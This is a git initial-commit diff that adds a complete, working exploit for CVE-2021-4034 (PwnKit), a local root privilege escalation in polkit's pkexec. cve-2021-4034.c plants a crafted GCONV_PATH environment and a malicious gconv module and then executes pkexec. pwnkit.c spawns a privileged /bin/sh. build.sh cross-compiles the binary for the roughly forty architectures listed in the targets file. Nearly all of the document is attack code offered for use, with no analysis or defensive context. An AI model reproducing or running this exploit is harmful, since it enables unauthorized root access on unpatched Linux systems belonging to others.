initial commit

build.sh

@@ -0,0 +1,18 @@
+rm -rf builds
+mkdir builds
+
+cat targets | while read COMPILER TARGET; do
+    echo "++ BUILD FOR $TARGET"
+    tmp_dir=`mktemp -d`
+
+    cp pwnkit.c cve-2021-4034.c $tmp_dir
+
+    docker run --rm -v $tmp_dir:/work muslcc/x86_64:$COMPILER gcc -s -Os -shared -fPIC -Wl,--unresolved-symbols=ignore-all -Wl,-z,now -nostdlib -ffreestanding -fno-builtin -o /work/pwnkit.so /work/pwnkit.c
+
+    xxd -i $tmp_dir/pwnkit.so | sed -r 's/ [^ ]*pwnkit_so/ pwnkit/' > $tmp_dir/pwninc.h
+    docker run --rm -v $tmp_dir:/work muslcc/x86_64:$COMPILER gcc -static -s -Os -I/work/ -o /work/cve-2021-4034 /work/cve-2021-4034.c
+    cp $tmp_dir/cve-2021-4034 builds/cve-2021-4034_$TARGET
+
+    rm -rf $tmp_dir
+done
+

cve-2021-4034.c

@@ -0,0 +1,63 @@
+#include "pwninc.h"
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <fcntl.h>
+
+void fatal(char *f) {
+    perror(f);
+    exit(-1);
+}
+
+int main(void) {
+
+    printf("CVE-2021-4034 - crossbuild by @c3c\n");
+    printf("Acknowledgements: Qualys, blasty, berdav\n");
+
+    struct stat st;
+    char *a_argv[]={ NULL };
+    char *a_envp[]={
+        "pwnkit.so:.",
+        "PATH=GCONV_PATH=.",
+        "SHELL=/lol/i/do/not/exists",
+        "CHARSET=PWNKIT",
+        "LC_MESSAGES=en_US.UTF-8",
+        "XAUTHORITY=../LOL",
+        "GIO_USE_VFS=",
+        NULL
+    };
+
+    if (stat("GCONV_PATH=.", &st) < 0) {
+        if(mkdir("GCONV_PATH=.", 0777) < 0) {
+            fatal("mkdir");
+        }
+    }
+
+    int fd = open("GCONV_PATH=./pwnkit.so:.", O_CREAT|O_RDWR, 0777); 
+    if (fd < 0) {
+        fatal("open");
+    }
+    close(fd);
+
+
+    FILE *fp = fopen("gconv-modules", "wb");
+    if(fp == NULL) {
+        fatal("fopen");
+    }
+    fprintf(fp, "module  UTF-8//    PWNKIT//    pwnkit    1\n");
+    fclose(fp);
+
+    FILE *fp2 = fopen("pwnkit.so", "wb");
+    if(fp2 == NULL) {
+        fatal("fopen2");
+    }
+    fwrite(pwnkit, 1, pwnkit_len, fp2);
+    fclose(fp2);
+
+    return execve("/usr/bin/pkexec", a_argv, a_envp);
+}
+
+

pwnkit.c

@@ -0,0 +1,18 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void gconv(void) {
+}
+
+void gconv_init(void *step)
+{
+	printf("Attempting to spawn root shell\n");
+	char * const args[] = { "/bin/sh", "-pi", NULL };
+	char * const environ[] = { "PATH=/bin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/sbin", NULL };
+	execve(args[0], args, environ);
+	exit(0);
+}
+
+
+

targets

@@ -0,0 +1,42 @@
+aarch64-linux-musl	aarch64
+aarch64_be-linux-musl	aarch64_be
+arm-linux-musleabi	arm-eabi
+arm-linux-musleabihf	arm-eabihf
+armeb-linux-musleabi	armeb-eabi
+armeb-linux-musleabihf	armeb-eabihf
+armel-linux-musleabi	armel-eabi
+armel-linux-musleabihf	armel-eabihf
+armv5l-linux-musleabi	armv5l-eabi
+armv5l-linux-musleabihf	armv5l-eabihf
+armv6-linux-musleabi	armv6-eabi
+armv6-linux-musleabihf	armv6-eabihf
+armv7l-linux-musleabihf	armv7l-eabihf
+armv7m-linux-musleabi	armv7m-eabi
+armv7r-linux-musleabihf	armv7r-eabihf
+i486-linux-musl	i486
+i686-linux-musl	i686
+m68k-linux-musl	m68k
+mips-linux-musl	mips
+mips-linux-musln32sf	mips-n32sf
+mips-linux-muslsf	mips-sf
+mips64-linux-musl	mips64
+mips64-linux-musln32	mips64-n32
+mips64-linux-musln32sf	mips64-n32sf
+mips64el-linux-musl	mips64el
+mips64el-linux-musln32	mips64el-n32
+mips64el-linux-musln32sf	mips64el-n32sf
+mipsel-linux-musl	mipsel
+mipsel-linux-musln32	mipsel-n32
+mipsel-linux-musln32sf	mipsel-n32sf
+mipsel-linux-muslsf	mipsel-sf
+powerpc-linux-musl	powerpc
+powerpc-linux-muslsf	powerpc-sf
+powerpc64-linux-musl	powerpc64
+powerpc64le-linux-musl	powerpc64le
+powerpcle-linux-musl	powerpcle
+powerpcle-linux-muslsf	powerpcle-sf
+riscv32-linux-musl	riscv32
+riscv64-linux-musl	riscv64
+s390x-linux-musl	s390x
+x86_64-linux-musl	x86_64
+x86_64-linux-muslx32	x86_64-x32